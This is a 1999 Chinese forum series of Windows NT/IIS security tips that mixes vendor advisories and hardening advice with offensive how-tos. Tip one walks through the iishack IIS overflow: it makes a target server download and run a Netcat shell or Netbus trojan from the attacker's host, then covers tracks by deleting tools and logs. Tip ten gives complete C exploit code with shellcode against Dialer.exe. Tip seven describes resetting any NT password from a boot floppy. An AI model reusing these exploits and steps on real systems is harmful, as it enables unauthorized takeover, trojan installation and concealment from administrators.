NT安全技术Tips

NT安全技术Tips之一

关键词：NT, 计算机安全

（原文内容加贴于1999年7月2日CHINA ASP安全技术版） M$的漏洞五花八门，层出不穷

最近Eeye发现的漏洞并写了2个小小的程序

在IIS的NT机器上有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现.IIShack.asm ,利用这个毛病,eEye写了两个程序: iishack.exe ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web server的目录下,比如你的web server是:www.mysvr.com 而对方的IIS server是www.xxx.com

则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意,不要加http://字符!)

上述命令输入后这时你应该可以看到

------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- barns@eeye.com. http://www.eEye.com

[usage: iishack ]

eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe do not include 'http://' before hosts!

--------------------------------------------------------------- Data sent!

这个时候，对方主机的IIS服务就关闭了??呵呵 恐怖8！

然后,再把Netbus等特洛伊木马传到对方机器上去:

iishack www.example.com 80 www.myserver.com/netbus.exe

ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务

ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用.所以可能不一定有效

然后,用Telnet到对方的99或80端口: Telnet www.xxx.com 99 结果是这样:

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

C:\\>[You have full access to the system, happy browsing :)] C:\\>[Add a scheduled task to restart inetinfo in X minutes] C:\\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\\>[Clean up any trace or logs we might have left behind.]

这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出

NT安全技术Tips之二

关键词：NT, 计算机安全

（原文加贴于1999年7月2日CHINA ASP安全技术版）

安 全 帐 户 管 理 (SAM) 数 据 库 可 以 由 以 下 用 户 被 复 制： Administrator 帐 户， Administrator 组 中 的 所 有 成 员， 备 份 操 作 员， 服 务 器 操 作 员， 以 及 所 有 具 有 备 份 特 权 的 人 员。

解 释：SAM 数 据 库 的 一 个 备 份 拷 贝 能 够 被 某 些 工 具 所

利 用 来 破 解 口 令。 NT 在 对 用 户 进 行 身 份 验 证 时， 只 能

达 到 加 密 RSA 的 水 平。 在 这 种 情 况 下， 甚 至 没 有 必 要 使 用 工 具 来 猜 测 那 些 明 文 口 令。 能 解 码 SAM 数 据 库 并

能 破 解 口 令 的 工 具 有： PWDump 和 NTCrack。 实 际 上， PWDump 的 作 者 还 有 另 一 个 软 件 包， PWAudit， 它 可 以 跟 踪 由 PWDump 获 取 到 的 任 何 东 西 的 内 容。

减 小 风 险 的 建 议：严 格 限 制 Administrator 组 和 备 份 组 帐 户 的 成 员 资 格。 加 强 对 这 些 帐 户 的 跟 踪， 尤 其 是 Administrator 帐 户 的 登 录 (Logon) 失 败 和 注 销 (Logoff) 失 败。 对 SAM 进 行 的 任 何 权 限 改 变 和 对 其 本 身 的 修 改 进

行 审 计， 并 且 设 置 发 送 一 个 警 告 给 Administrator， 告 知 有 事 件 发 生。 切 记 要 改 变 缺 省 权 限 设 置 来 预 防 这 个 漏

洞。

改 变 Administrator 帐 户 的 名 字， 显 然 可 以 防 止 黑 客 对 缺 省 命 名 的 帐 户 进 行 攻 击。 这 个 措 施 可 以 解 决 一 系 列 的

安 全 漏 洞。 为 系 统 管 理 员 和 备 份 操 作 员 创 建 特 殊 帐 户。 系 统 管 理 员 在 进 行 特 殊 任 务 时 必 须 用 这 个 特 殊 帐

户 注 册， 然 后 注 销。 所 有 具 有 Administrator 和 备 份 特 权 的 帐 户 绝 对 不 能 浏 览 Web。 所 有 的 帐 户 只 能 具 有 User 或 者 Power User 组 的 权 限。

采 用 口 令 过 滤 器 来 检 测 和 减 少 易 猜 测 的 口 令， 例 如， PASSPROP (Windows NT Resource Kit 提 供)， ScanNT (一 个 商 业 口 令 检 测 工 具 软 件 包)。 使 用 加 强 的 口 令 不 易 被 猜 测。 使 用 最 新 版 本 的 Service Pack 可 以 加 强 NT 口 令， 一 个 加 强 的 口 令 必 须 包 含 大 小 写 字 母， 数 字， 以 及 特 殊 字 符。 使 用 二 级 身 份 验 证 机 制， 比 如 令 牌 卡 (Token Card)， 可 提 供 更 强 壮 的 安 全 解 决 方 案， 不 过 是 要 米 米 的 哦??

NT安全技术Tips之三

关键词：NT, 计算机安全

（原文加贴于1999年7月2日CHINA ASP安全技术版）

日期 : 1999/05/27 分類 : Microsoft

來源參考 :Microsoft Security Bulletin __ 簡述

_________________________________________________________________ 微軟公布 WIndows NT RAS 與 RRAS 的修正程式，修正使用者取消 \password\

選項時，使用者的 password 仍會被儲存的缺失。 __ 說明

_________________________________________________________________ 1.當客戶端使用 Microsoft RAS 或 RRAS 撥接進入伺服器端，會詢問使用者是否要

儲存密碼 \，這項功能儲存使用者的安全資訊，但卻忽略了使用

者可能取消 \選項。

2.Windows 藉由 ACLs 保護存放於 registry 檔中使用者的安全資訊，包括 password

，而 ACLs 只允許管理者與有權限的使用者能存取該資訊，Windows NT 4.0 Service

Pack 4 另外提供以 SYSKEY 這個 registry 項目存放加密過的密碼資料。

3.當使用者取消 \選項時， registry 中所儲存的安全資訊並不會 消失。微軟公布修正程式，修正此項系統缺失，並要求使用 RAS 或 RRAS 的使用者

必須更新程式。 __ 影響平台

_____________________________________________________________ 1.Microsoft Windows NT Workstation 4.0

2.Microsoft Windows NT Server 4.0

3.Microsoft Windows NT Server 4.0, 企業版 __ 修正方式

_____________________________________________________________ 請根據使用 RAS 或 RRAS ，至下列網址取得更新程式： - RAS:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public /fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/ - RRAS:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public /fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/ __ 影響結果

_____________________________________________________________ 可能會洩漏使用者的安全性資訊

Microsoft 發佈有關 CSRSS Worker Thread Exhaustion 安全性漏洞的修正程式。 -- 說明---------------------------------------------------------------

1. 在 CSRSS.EXE 的執行過程中，如果讓所有執行程序都在等待使用者的輸入動作

，這時候系統無法再繼續對其他需求提供服務，進而造成系統停擺，如果使用者

開始輸入，則執行程序會恢復正常。

2. 本修正程式用來確保最後一個 CSRSS 的 worker thread 並不需要使用者的輸入

動作，即可提供服務，藉此終止此項安全性弱點。 3. 更多訊息請參考以下網址：

http://support.microsoft.com/support/bulletins/ms99-021faq.asp. http://support.microsoft.com/support/kb/articles/q231/3/23.asp. http://www.microsoft.com/security/default.asp.

-- 影響平台 ---------------------------------------------------------- - Microsoft Windows NT 4.0 Workstation - Microsoft Windows NT 4.0 Server

- Microsoft Windows NT 4.0 Server, Enterprise Edition.

-- 修正方式 ---------------------------------------------------------- 修正程式可以從以下網址獲得：

ftp://ftp.microsoft.com/bussys/winnt/\\

winnt-public/fixes/usa/nt40/Hotfixes-PostSP5/CSRSS-fix/

注意：以上網址為了閱讀方便，已經分成兩行。請自行從\處將兩行接起。 -- 影響結果-----------------------------------------------------------

Denial of Service attack.

Microsoft 發佈有關 malformed LSA request 安全性漏洞的修正程式。 -- 說明---------------------------------------------------------------

1. Windows NT 提供一項名為 LSA(Local Security Authority) 的 API，可以有系 統的管理使用者的權限等級，功能包括查詢使用者名稱，修改等級，更換 安全性政策以及程式的認證等。

2. 某些 API 所採用的方法無法正常處理不正確的參數形態，因此可能造成 DoS 形

式的攻擊行為，因此受到攻擊的 service 需要重新啟動，但是並不能從攻擊 LSA

取得執行其他未獲許可的 service 的能力。

-- 影響平台 ---------------------------------------------------------- - Microsoft Windows NT 4.0 Workstation - Microsoft Windows NT 4.0 Server

- Microsoft Windows NT 4.0 Server, Terminal Server Edition, 4.0 -- 修正方式 ---------------------------------------------------------- 修正程式可以從以下網址獲得：

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa\\ /NT40/hotfixes-postSP5/LSA3-fix/

注意：以上網址為了閱讀方便，已經分成兩行。請自行從\處將兩行接起。 -- 影響結果----------------------------------------------------------- Denial of Service attack.

NT安全技术Tips之四

关键词：NT, 计算机安全

（原文加贴于1999年7月4日CHINA ASP安全技术版）

特 洛 伊 木 马 (Trojan Horses) 和 病 毒， 可 能 依 靠 缺 省 权 利 作 SAM 的 备 份， 获 取 访 问 SAM 中 的 口 令 信

息， 或 者 通 过 访 问 紧 急 修 复 盘 ERD 的 更 新 盘。

解 释： 特 洛 伊 木 马 (Trojan Horses) 和 病 毒， 可 以 由 以 下 各 组 中 的 任 何 成 员 在 用 缺 省 权 限 作 备 份 时 执 行 (缺 省

地， 它 们 包 括： Administrator 管 理 员， Administrator 组 成

员， 备 份 操 作 员， 服 务 器 操 作 员， 以 及 具 有 备 份 特 权

的 任 何 人)， 或 者 在 访 问 ERD 更 新 盘 时 执 行 (缺 省 地， 包 括 任 何 人)。 例 如， 如 果 一 个 用 户 是 Administrator 组 的 成 员， 当 他 在 系 统 上 工 作 时， 特 洛 伊 木 马 可 能 做 出 任 何 事 情。

减 小 风 险 的 建 议： 所 有 具 有 Administrator 和 备 份 特 权 的 帐 户 绝 对 不 能 浏 览 Web。 所 有 的 帐 户 只 能 具 有 User 或 者 Power User 组 的 权 限。

(原加贴日期7月8日)

Rdisk是NT提供的紧急修复磁盘工具，对于Administrator来说，It's a good tool。但是对于系统而言，这个漏洞也实在??实在??

用户可利用Rdisk将所有的安全信息（口令和注册信息）放在c:\\winnt4\\repair中 由此，攻击者用一些工具在几个小时之内就可以获得口令

你的系统可就??嘿嘿

至于破NT口令的工具嘛，很多，以后再介绍吧

你可以自己运行一下Rdisk /s，然后去你的c:\\winnt4\\repair目录下看看。

NT安全技术Tips之五

关键词：NT, 计算机安全

（原文加贴于1999年7月5日CHINA ASP安全技术版） COMMAND

LSASS (or WinLogon)

SYSTEMS AFFECTED

WinNT

PROBLEM

Martin Wolf found following. He has discovered what seems to be a

bug in Windows NT, with possible security consequences. Specifically, it would allow any user with local access to a machine, as long as they have write access to the root directory of the boot partition, to install a Trojan horse which is then

executed whenever someone logs on locally. The problem is that when this partition (the one containing %systemroot%) contains a

file such as NDDEAGNT.EXE, EXPLORER.EXE, USERINIT.EXE or

TASKMGR.EXE, that file will be executed instead of the one in the

%systemroot% or %systemroot%\\system32 directory. This can be easily demonstrated:

1. Copy an executable file (CALC.EXE will do) to the rootdir. 2. Rename the file to NDDEAGNT.EXE.

3. Log off, and log on again as the same or a different user.

The Calculator program will now start immediately, using the security privileges of the logged-on user (OK, bad example..).

This behaviour seems to occur on any out-of-the-box NT4 installation, even with SP4, although obviously it can only be exploited by someone with write access to the specified location.

It also works with TASKMGR.EXE, but only when the task manager is started using Ctrl-Alt-Del, not when it is started from the taskbar. This suggests the problem lies with Winlogon or the LSASS subsystem.

SOLUTION

Surely, use NTFS and set up permission. MS responded that the system should be configured so that ordinary users do not have write access to the root directory. This is obviously true; however, it still seems to be a bug, as in \ expected behaviour\ Also, it does not work on all machines even when the attacker does have write access to the system boot partition, but not yet sure exactly where the problem lies.

NT安全技术Tips之六

关键词：NT, 计算机安全

（原文加贴于1999年7月6日CHINA ASP安全技术版）

For those of you that have too many IIS machines to yank this off by hand here is some vb code to set your IIS metabase remotely... VB 5.0 sp3 IIS Resource kit installed -- Metabase editor utility from resource kit needs to be installed.

Have fun! You can set all of you metabase up with the tools mentioned above. :-)

--------------------------------------------------------------------------------

'The subs I put in Modules handles the App Mappings tab of the 'application configuration screen Sub AppMappings(ByRef IIS)

'delete all existing script paths

Call DeleteAllLowerProperties(IIS, \

'the only thing changed on scripts maps is htm & html mapped to 'asp.dll and removed the ism.dll mapping newscriptmaps =

Array(\\\\\\\\

\\

\\\

IIS.PutEx 2, \

IIS.SetInfo

End Sub

Sub DeleteAllLowerProperties(ByRef IIS, ByVal PropertyName)

'delete all existing script paths

PathList = IIS.GetDataPaths(PropertyName, 1)

If Err.Number <> 0 Then

For Each Path In PathList

Set objScriptPath = GetObject(Path)

objScriptPath.PutEx 1, PropertyName, True Next End If

End Sub

' Start form1 here

Function GetServerArray()

GetServerArray = Array(\

End Function

Private Sub Form_Load()

ServerArray = GetServerArray() For Each Server In ServerArray

Set globalW3svc = GetObject(\ Call AppMappings(globalW3svc)

Next End Sub

这里是M$给的建议

http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9906&L=ntbugtraq&F=P&S=&P=3267

NT安全技术Tips之七

关键词：NT, 计算机安全

（本部分原文加贴于1999年7月11日CHINA ASP安全技术版）

打印操作员组中的任何一个成员对打印驱动程序具有系统级的访问权。

不怀号衣的人可以利用这个安全漏洞，用一个Trojan Horse程序替换任何一个打印驱动程序，当被执行时，它不需要任何特权；或者在打印驱动程序中插入恶意病毒，具有相同效果。

解决办法：在赋予打印操作员权限时，要采取谨慎态度。要限制人数。进行系统完整性检查。适当配置和调整审计，并且定期检查审计文件。随时发现问题并解决问题。

（本部分原文加贴于1999年7月14日CHINA ASP安全技术版） 一个老话题，但是有一个新方法

关于忘记Administrator用户口令后的办法！ 用L0pht Crack破Sam包是一个好办法

我现在推荐的是一个新方法，不知你有没有见过！ 你首先要做一些准备工作 到这里来下载

metalab.unc.edu/pub/linux/system/install/rawrite/rawrite3.zip 里面会有一个rawrite.exe 然后你再下载一个东西

www.nmrc.org/files/snt/bootdisk.bin

你就可以把这个bin写到一张软盘上，然后用软盘启动你的服务器

会装入Linux系统，加载NTFS分区，并提供一个可以用来不知道口令的情况下更改任何帐号的口令的程序！

还有一点需要主意的地方：你改了口令重新登陆NT的时候要写 \不要写\Understand?

NT安全技术Tips之八

关键词：NT, 计算机安全

（原文加贴于1999年7月16日CHINA ASP安全技术版）

Here are 18 easy tips that can go a long way towards making your NT network a safer place. This list is meant to be used only as a brief reminder - it only covers a tiny part of what you may need to think about - but it won't hurt at all to make sure you've at least considered the following items in your environment:

1. Always use NTFS disk partitions instead of FAT. NTFS offers security features, and FAT doesn't. It's that simple. If you must use a FAT partition for any reason, do not place any system files on that partition, and be careful about putting sensitive information on that FAT partition as well - you won't be able to set any access

permissions for files and directories on that drive. And, if it's shared, it's open season on the shared tree.

2. Make sure that all of NT's password control features have been implemented. This includes requiring users to have strong passwords, forcing users to change their passwords at regular intervals, and hiding the last username to login (as seen in the logon dialog by default). NT can lock out accounts after so many bad password attempts. Be sure to enable this setting, as it greatly impairs an intruders ability to brute force guess your passwords. Force the use of strong and complex passwords -- and instruct users not to write them down anywhere unless they can be safely locked up afterwards. Cryptography experts say that as long as MS doesn't change the crypto system used for the SAM database (users and passwords, et al), the best choice for passwords lengths are between 6 and 8 characters. Without going into a ton of techno

babble, this causes possible time needed to crack the password to be extended

considerably. And we're here to tell you, brute force guessing of passwords is one of the most popular ways of penetrating a network today. You may also want to employ the PASSFILT.DLL that comes with SP2 and SP3 - it forces strong password choices on users. Learn more about this .DLL in Microsoft's Knowledge Base article. You'll also find information in the README file accompanying the Service Packs.

3. It's no secret. The default Adminstrator account is a target for most intruders. Create a new administrator account, and take away all permissions from the existing Administrator account. Do this by creating a new user, adding them to the

Administrators group, and duplicating all account policies and permissions granted to the default Adminstrator account. Once finished, go back and remove all rights and permissions from the default Administrator account. But leave it enabled, this way intruders won't know it's crippled until they take the time to actually crack the account.

4.Minimize the number of users that belong to the Administrator's group. Don't ever add someone to this group for the sake of convenience, and check it's membership routinely.

5. Enable auditing on all NT systems. Open the User Manager, and on the Policies | Audit menu, you'll find the account related events that may be audited. By using Explorer (or File Manager) to view properties, you'll be able to establish auditing on media related objects as well.

6. Be careful about establishing NT domain trusts. Things can get out of hand quickly on larger networks with several NT domains. Microsoft has released a Domain

Planning Guide that really helps a lot when designing your domain layouts. Check the MS NT web site for more information on this tool. http://www.microsoft.com/ntserver

7. Disable NetBIOS over TCP/IP network bindings where ever you can - especially on your NICs leading to the Internet, if at all possible.

8. Block all non-essential TCP/IP ports, both inbound and outbound. In particular, at least block UDP ports 137 and 138, and TCP port 139. This may prevent several types of attacks from ever making their way into your network.

9. Revoke the \need to connect to that particular NT system. Those accounts can then only be used to logon on locally.

10. Periodically check your systems for unwanted user accounts. Delete or disable unused accounts. When establishing temporary accounts (for vendors, contractors,

etc), be sure to set an expiration date for the account, and assign rights and permissions carefully.

11. Display a legal notice on your systems that warn each potential user that access to the system is restricted - authorized users only and sessions may be monitored. In some places its against the law to monitor computer sessions - even on your own

network. With the notice, you'll most likely be able to watch an intruder if you need to, without any future legal recourse against you. Do this on your Web site, your FTP server, your NT logon screens (edit the registry), and any place else that provide a means to do so.

12. Make sure your users do not leave their NT workstations turned on and

unattended. Your policies should dictate that screen savers should be activated before leaving a workstation momentarily, and users should logoff when they aren't going to return in a reasonable amount of time. Additionally, depending on your environment, you may want to have a policy mandating that systems be powered off when users leave for the day. This is a good way of helping to prevent unwanted modem dialups and rogue Web and FTP sites as well.

13. The Guest account is created by default with each NT installation. If you do not need to permit Guest users on your system, remove or disable the Guest account, and take the extra time to setup a unique user ID for each person who must access your system temporarily. If you don't want to delete the Guest account, preferring instead to disable it, make certain you check it routinely to ensure it remains disabled.

14. Monitor your networks closely. A large percentage of break-ins occur on networks that were already secure to some extent, but simply weren't monitored closely enough. Use a robust network monitoring package to perform this task for you -- NTManage comes to mind here. You may want to use a realtime attack recognition system, like the upcoming RealSecure from ISS. And, you might want some cool registry, event log, and access control tools, like those found at Somarsoft.

15. Make sure the routers used between your untrusted bordering networks (Internet, etc) can (and are configured to) stop source routing, IP spoofing, and ICMP redirects. And it's also real good to have anti-scanning features too -- all of these items go along way towards stopping some nasty attack mechanisms.

16. Disable the Simple TCP/IP Services (if installed) using Control Panel | Services. This stops the chargen, echo, daytime, discard, and quote of the day (qotd) services. Any of which could be used for denial of service attacks. None of these services are required for proper network operation - although you should be aware that a few types of network monitors occasionally test the echo port when they cannot get a response using ping.

17. Don't run services you don't actually need - more often than not, they're neglected and frequently become the target of attack.

18. Help raise security awareness. Hey, why not start by telling a friend to come visit our site!

NT安全技术Tips之九

关键词：NT, 计算机安全

（原文加贴于1999年7月22日CHINA ASP安全技术版）

MDAC (Microsoft Data Access Components) 对于各位ASP高手来说不是什么新鲜玩意8，呵呵

他能把你的Web和你的数据库服务紧紧地结合。他有一个组建 RDS (Remote Date Services)。 RDS 允许远程用户由Internet通过IIS访问你的数据库，而且在你的安装Optine Pack的时候，他会作为默认安装装到你的服务器上。

RDS有一个组件叫做 DataFactory，他有一个Holes存在，他能使用户： ·在未授权的情况下通过IIS服务发现你未公布的文件

·局域或广域的用户使用ODBC可以进入你的non-public(这个单词不会翻译)服务器并且可以当他attack其他网络的时候可以隐藏他的源地址

而这些仿佛离我们太远，这个报告中最主要的Hole是：

如果你安装了Microsoft JET OLE DB Provider或者Microsoft Datashape Provider，用户能够在服务器上用系统权限使用Shell()--这个VBA命令。（需要了解更多的信息请参考 Microsoft JET Database Engine VBA Vulnerability）

这些弱点结合起来可以让入侵者在你的机器上任意执行系统一级的某些危险命令，太??太??太恐怖了。

需要注意的是，MDAC 2.x并不象以前的版这么容易受攻击，不过升级你以前的版本仍然会遗留后门，所以应该remove再从新安装MDAC。

解决办法：

安装最终版本MDAC 2.1.2.4202.3

http://www.microsoft.com/data/download.htm

如果你安装了MDAC 1.5版或2.X版，而它对于你来说有没有什么实际含义的话 我的建议就是禁止这种服务，删除这个虚拟目录，或者删除下面这些

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\ADCLaunch\\RDSServer.DataFactory

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\ADCLaunch\\AdvancedDataFactory

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters\\ADCLaunch\\VbBusObj.VbBusObjCls

如果你需要的话，你必须这么做：（当然，我也不会勉强你的） ·禁止匿名用户进入 /msdac 虚拟目录

·自己创建一个handler过滤掉这些请求，当然有教程的落 到http://www.microsoft.com/Data/ado/rds/custhand.htm去看看

或者下载这个文件修改你的注册表，

http://www.microsoft.com/security/bulletins/handsafe.exe

它会将你的注册表的这些地方进行修改！

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory]

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo \\

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList\\MSDFMAP.Handler

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList\\MSDFMAP_VB.Handler

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\DataFactory\\HandlerInfo\\safeHandlerList\\MSDFMAP_VC.Handler

NT安全技术Tips之十

关键词：NT, 计算机安全

（原文加贴于1999年8月4日CHINA ASP安全技术版）

NT下的Dialer.exe是一个电话拨号程序，这次发现的这个Hole会让攻击者在你的服务器上执行一些恐怖的命令??

存在漏洞的版本：

Microsoft Windows NT Workstation 4.0 Microsoft Windows NT Server 4.0

Microsoft Windows NT Server 4.0, Enterprise Edition

Microsoft Windows NT Server 4.0, Terminal Server Edition

当你执行Dialer.exe的时候，他会在dialer.ini中寻找上次拨号的号码，如果这个号码是特别的长的话，嘿嘿??

下面有一断代码能够创建一个特洛伊的dialer.ini，当你执行dialer.exe的时候会让你去执行一个文件名为\的批处理文件，如同执行

Winexec(\，然后ExitProcess(0)。当dialer.ini被特洛伊后，恶意的攻击者能够自己做一个code.bat替换以前的那个code.bat并执行。

这里有一段程序，可以借鉴 #include #include

int main(void) {

FILE *fd;

char ExploitCode[256]; int count = 0;

while (count < 100) {

ExploitCode[count]=0x90; count ++; }

// ExploitCode[100] to ExploitCode[103] overwrites the real return address // with 0x77F327E5 which contains a \// to our payload of exploit code ExploitCode[100]=0xE5; ExploitCode[101]=0x27; ExploitCode[102]=0xF3; ExploitCode[103]=0x77;

// procedure prologue - push ebp // mov ebp,esp

ExploitCode[104]=0x55; ExploitCode[105]=0x8B;

// This moves into the eax register the address where WinExec() is found // in kernel32.dll at address 0x77F1A9DA - This address has been hard- // coded in to save room rather than going through LoadLibrary() and // GetProcAddress () to get the address - since we've already hard // coded in the return address from kernel32.dll - there seems no // harm in doing this

ExploitCode[106]=0xEC; ExploitCode[107]=0xB8; ExploitCode[108]=0xDA; ExploitCode[109]=0xA9;

ExploitCode[110]=0xF1; ExploitCode[111]=0x77;

// We need some NULLs to terminate a string - to do this we xor the esi // register with itself - xor esi,esi ExploitCode[112]=0x33; ExploitCode[113]=0xF6;

// These NULLs are then pushed onto the stack - push esi ExploitCode[114]=0x56;

// Now the name of the batch file to be run is pushed onto the stack // We'll let WinExec() pick up the file - we use push here // to push on \ExploitCode[115]=0x68; ExploitCode[116]=0x2E; ExploitCode[117]=0x62; ExploitCode[118]=0x61; ExploitCode[119]=0x74;

// And now we push on \ExploitCode[120]=0x68; ExploitCode[121]=0x63; ExploitCode[122]=0x6F; ExploitCode[123]=0x64; ExploitCode[124]=0x65;

// We push the esi (our NULLs) again - this will be used by WinExec() to determine

// whether to display a window on the desktop or not - in this case it will not

ExploitCode[125]=0x56;

// The address of the \this

// becomes a pointer to the name of what we want to tell WinExec() to run ExploitCode[126]=0x8D; ExploitCode[127]=0x7D; ExploitCode[128]=0xF4;

// This is then pushed onto the stack ExploitCode[129]=0x57;

// With everything primed we then call WinExec() - this will then run

code.bat

ExploitCode[130]=0xFF; ExploitCode[131]=0xD0;

// With the batch file running we then call ExitProcess () to stop dialer.exe

// from churning out an Access Violation message - first the procedure //prologue push ebp and movebp,esp ExploitCode[132]=0x55; ExploitCode[133]=0x8B; ExploitCode[134]=0xEC;

// We need to give ExitProcess() an exit code - we'll give it 0 to use - we need

// some NULLs then - xor esi,esi ExploitCode[135]=0x33; ExploitCode[136]=0xF6;

// and we need them on the stack - push esi ExploitCode[137]=0x56;

// Now we mov the address for ExitProcess() into the EAX register - again we

// we hard code this in tieing this exploit to NT 4.0 SP4 ExploitCode[138]=0xB8; ExploitCode[139]=0xE6; ExploitCode[140]=0x9F; ExploitCode[141]=0xF1; ExploitCode[142]=0x77;

// And then finally call it ExploitCode[143]=0xFF; ExploitCode[144]=0xD0;

// Now to create the trojaned dialer.ini file fd = fopen(\if (fd == NULL) {

printf(\return 0; }

// Give dialer.exe what it needs from dialer.ini

fprintf(fd,\Window Left/Top=489, 173\\n[Last dialed numbers]\\nLast dialed 1=\

// And inject our exploit code fprintf(fd,ExploitCode);

fclose(fd); }

说明：

dialer.ini文件是每个运行过dialer.exe的用户都能创建的。建议到微软去下载这个补丁

补丁地址：

Windows NT Server; Windows NT Server 4.0, Enterprise Edition; and Windows NT Workstation 4.0:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP5/Dialer-fix/

Windows NT Server 4.0, Terminal Server Edition:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40tse/hotfixes-postSP4/Dialer-fix/

NT安全技术Tips之十二

关键词：NT, 计算机安全

(原文加贴于安全技术版1999年9月2日)

我们该为千疮百孔的NT 做些什么？

如何配置一台NT对大家来说不是一件很困难的事，可是要配置一台安全性高的NT可就不那么容易了，作为一个好的系统管理人员，一定要学会怎么让你手中的NT 4达到真正的C2级。

 最重要的一点，经常留意一些安全站点，使用最新的Service Pack并时常打一些小补丁。

 硬盘必须Format 成NTFS格式，如果你现在使用的是FAT的文件格式，赶快用convert.exe转换成NTFS格式吧。

 关闭NTFS的8.3格式文件识别，这需要在

HKEY_LOCAL_MACHINE\\SYSTEM \\CurrentControlSet\\Control\\FileSystem 中将NtfsDisable8dot3NameCreation的值设为“1”。

 系统启动的等待时间设置为0秒，控制面板->系统->启动/关闭，然后将列表显示的默认值“30”改为“0”。

 将你的Web服务器设置为独立的服务器，也能提高不少安全级别。

 Remove 你NT服务器上的其他系统OS/2，Linux……，以免他人从别的系统上修改你的NT系统。

 删除你的网络共享，你可以使用这样的命令net share /d，那些为了管理而设置的共享就必须通过修改注册表的方法来实现了，HKEY_LOCAL_MACHINE\\SYSTEM

\\CurrentControlSet\\Control\\Services\\LanmanServer\\Parameters 的 AutoShareServer改为0。

 严格审核Success/Failed Logon/Logoff日志，域用户管理器->规则->审核。

 隐藏上次登陆用户名，修改注册表

HKEY_LOCAL_MACHINE\\SOFTWARE \\Microsoft\\Windows NT\\Current Version\\Winlogon 中的 DontDisplayLastUserName改为0。

 在你的logon对话框中把”Shutdown”按钮移走，修改注册表HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WindowsNT\\Current Version\\Winlogon 中的 ShutdownWithoutLogon改为0。

 设定用户的口令长度，一般可以设到9位，密码位数到了这个数字再被猜出的可能性就很小了；关闭guest帐号，将Administrator帐号改名，并为管理员设置一个强壮的口令。

 Windows NT 有这样一个特征，他允许未认证的用户进入网络列举域内用户，如果你要禁止这个功能，修改

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA 中的RestrictAnonymous ，将它的值改为1。

 只有管理员能分配打印机和盘符，要完成这个功能必须使用Windows NT Resource Kit中的一个工具C2Conifg才可以完成。

 注册表允许远程修改，这么做是危险的，最好是禁止。

 最好不要绑定BetBIOS服务，以免被人使用Nbtstat等工具取得服务器的信息。

 禁止IP转发，控制面板->网络->协议->TCP/IP协议->属性，使这个选框为空。

 配置TCP/IP过滤，这样做你可能有很多服务被禁止，但可以减少许多许多不必要的麻烦，具体配置的方法是：控制面板->网络->协议-.TCP/IP协议->属性->高级->启用安全机制->配置，你可以这样配置TCP Ports 80和443（SSL的端口）；不允许UDP端口；IP协议6，这是一个典型的安全配置，推荐使用。

 不妨运行一下SYSKEY程序，加密你的帐号数据库

 把一些工具从你的NT目录中转移到一个安全的目录，例如：cmd.exe，net.exe，telnet.exe，ftp.exe ……

这些就是NT 4的一些安全配置，如果你对你的服务器安全有较高的要求，这可以作为一个借鉴，也许我还遗忘了一些什么，希望大家能及时和我联系(adam2000@21cn.com)。

下面，我再谈谈NT 4的搭档IIS 4.0的一些安全配置方法。

 首先是安装一个能满足你需要的最小的IIS

 设置正确的Server访问控制权限

.EXE, .CGI，.DLL, .CMD, .PL 权限设置Everyone (X)，Administrators (Full Control)，System (Full Control)

.ASP 的权限设置 Everyone (X)，Administrators (Full Control)，System (Full Control)

.INC, .SHTML, .SHTM 的权限设置Everyone (X)，Administrators (Full Control)，System (Full Control)

.HTML, .GIF, .JPEG的权限设置 Everyone (R)，Administrators (Full Control)，System (Full Control) 。

 正确设置虚拟目录，建议把默认安装后的那些虚拟目录删除IIS --c:\\inetpub\\iissamples，IIS SDK--c:\\inetpub\\iissamples\\sdk，Admin

Scripts--c:\\inetpub\\AdminScripts，Data access--c:\\Program Files\\Common Files\\System\\msadc\\Samples，这些目录将给你的系统带来不必要的麻烦。

 正确设置IIS日志访问权限，ACL：Administrators (Full Control)，System (Full Control)。

 适当地设置IP拒绝访问列表，防止有些讨厌的家伙攻击你的Server。

 设置并使用Secure Sockets Layer

 删除一些你用不上的组件，regedit XXX.dll /u。

 删除这个虚拟目录IISADMPWD，因为它允许你重新设置你的管理员口令，实在是比较危险，还是不要的好。

 删除一些不必要的Scipt Mapping，象.htr,.idc,. shtm, .stm, .shtml，都可以删除。

 禁止RDS的支持，因为最近发现了一个他的bug，所以最好还是禁用的好。

 使用IIS登陆日志，每天记录客户IP地址，用户名，服务器端口，方法，URI字根，HTTP状态，用户代理。

